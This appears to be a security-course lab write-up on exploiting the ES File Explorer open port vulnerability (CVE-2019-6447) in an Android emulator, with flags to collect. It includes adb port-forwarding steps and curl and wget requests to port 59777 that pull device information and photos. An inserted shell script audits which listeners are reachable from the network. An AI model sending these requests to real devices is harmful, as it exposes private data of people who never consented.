Here is the writeup describing the vulnerability: ES File Explorer Open Port Vulnerability - CVE-2019-6447
It's very easy to see and exploit.
This was a zero-day exploit when it was dropped on Twitter on Jan. 16, 2019:
Drag the APK file onto your Android device and drop it there. Approve the application installation.
Click Agree, ALLOW, and "START NOW", as shown below.
You see information about your files, as shown below.
adb connect 172.16.123.154:5555
adb devices -l
You should see your Android device in the "List of devices attached", as shown below.
Find the Android SDK Location, outlined in green in the image below.
In a Terminal or Command Prompt, execute the commands below, replacing the path in the first command with the correct Android SDK Location on your system.
cd /Users/sambowne/Library/Android/sdk
cd platform-tools
./adb devices -l
You should see your Android device in the "List of devices attached", as shown below.
adb shell
netstat -pant 2>/dev/null | grep LISTEN
exit
You see a process listening on port 59777, as shown below.
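As an added example (not part of the original lab), the shell functions below filter `netstat -pant` output down to listeners that are reachable from the network, which is how the port 59777 service stands out when you audit a device you own. The sample output and the process names in it are constructed.

```shell
#!/bin/sh
# Added example: flag TCP listeners bound to non-loopback addresses in
# `netstat -pant` output, e.g. the port 59777 listener described above.

# Constructed sample of `netstat -pant` output (not captured from a real device;
# com.example.filemgr and com.example.app are placeholder process names).
SAMPLE_NETSTAT='Proto Recv-Q Send-Q Local Address   Foreign Address State  PID/Program Name
tcp   0 0 127.0.0.1:5037   0.0.0.0:*  LISTEN 901/adbd
tcp6  0 0 :::59777         :::*       LISTEN 4312/com.example.filemgr
tcp6  0 0 :::5555          :::*       LISTEN 901/adbd
tcp   0 0 10.0.2.15:41822  203.0.113.7:443 ESTABLISHED 2210/com.example.app'

# Read netstat text on stdin and print "port address program" for every
# LISTEN socket that is not bound to a loopback address.
exposed_listeners() {
    awk '$6 == "LISTEN" {
        addr = $4
        # The port is whatever follows the last colon (works for IPv4 and IPv6).
        n = split(addr, parts, ":")
        port = parts[n]
        host = substr(addr, 1, length(addr) - length(port) - 1)
        # Loopback-only listeners are not reachable from other hosts.
        if (host == "127.0.0.1" || host == "::1" || host ~ /^::ffff:127\./) next
        # Wildcard binds (0.0.0.0 or ::) and specific interface addresses remain.
        print port, host, $7
    }'
}

# Exit 0 if the given port has a network-reachable listener, 1 otherwise.
port_exposed() {
    exposed_listeners | awk -v p="$1" '$1 == p { found = 1 } END { exit !found }'
}

# Demo on the constructed sample. On a real device, pipe in the page's command:
#   adb shell netstat -pant 2>/dev/null | exposed_listeners
printf '%s\n' "$SAMPLE_NETSTAT" | exposed_listeners
```

A listener bound to `127.0.0.1` is filtered out, while one bound to `::` or `0.0.0.0` is reported because it accepts connections from any host that can reach the device.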
If you are using a Mac or Linux machine, execute this command:
adb forward tcp:59777 tcp:59777
The response is to echo the port number 59777, as shown below.
Windows Users
In a Command Prompt window, in the "platform-tools" directory, execute these commands:
adb kill-server
adb -a nodaemon server start
Leave that Command Prompt window open.
Open a new Command Prompt window. Change directory to the "platform-tools" directory, and execute these commands:
adb forward tcp:59777 tcp:59777
netstat -an -p tcp
You should see the arbitrary address 0.0.0.0 LISTENING on port 59777.
Install Windows Subsystem for Linux and Ubuntu, as explained here.
In an Ubuntu command prompt window, execute this command:
cat /etc/resolv.conf
This shows the IP address of your Windows system.
In the Ubuntu command prompt window, execute this command, replacing 127.0.0.1 with the correct address for your Windows system:
curl --header "Content-Type: application/json" --request POST --data '{"command":"getDeviceInfo"}' http://127.0.0.1:59777
M 207.1: ftpPort (10 pts)
Execute this command to load information from the ES File Explorer process:
curl --header "Content-Type: application/json" --request POST --data '{"command":"getDeviceInfo"}' http://127.0.0.1:59777
You see information about your phone, as shown below.
Find the text covered by a green box in the image above. That's the flag.
In Android, on the right side, click the Webcam icon, colored pink in the image below.
Adjust the camera to access your host system's webcam, as shown below.
On the right side, in Device Manager, click the pencil icon to edit your emulated device, outlined in green in the image below.
At the bottom of the next window, click the "Show Advanced Settings" button.
In the next window, switch a Camera to Webcam0, outlined in green in the image below.
Now launch Android Studio, launch the emulator, open ES File Explorer, and configure port forwarding again.
Click Finish.
Start your emulator. Launch the Camera app and take a photo.
In a Terminal or Command Prompt, execute this command:
curl --header "Content-Type: application/json" --request POST --data '{"command":"listPics"}' http://127.0.0.1:59777
Find the path to your image in the output, as shown below.
Execute this command, replacing the image path with the correct values for your system:
wget http://127.0.0.1:59777//XXXXXXX/emulated/0/DCIM/Camera/IMG_20190116_141301.jpg
M 207.2 Image Path (10 pts extra)
The flag is covered by a green rectangle in the image below.
The file downloads, as shown below.
In the GUI, navigate to the file and double-click it to open it, as shown below.
Here's what I tried, and none of them stopped the attack, as of Jan 17, 2019.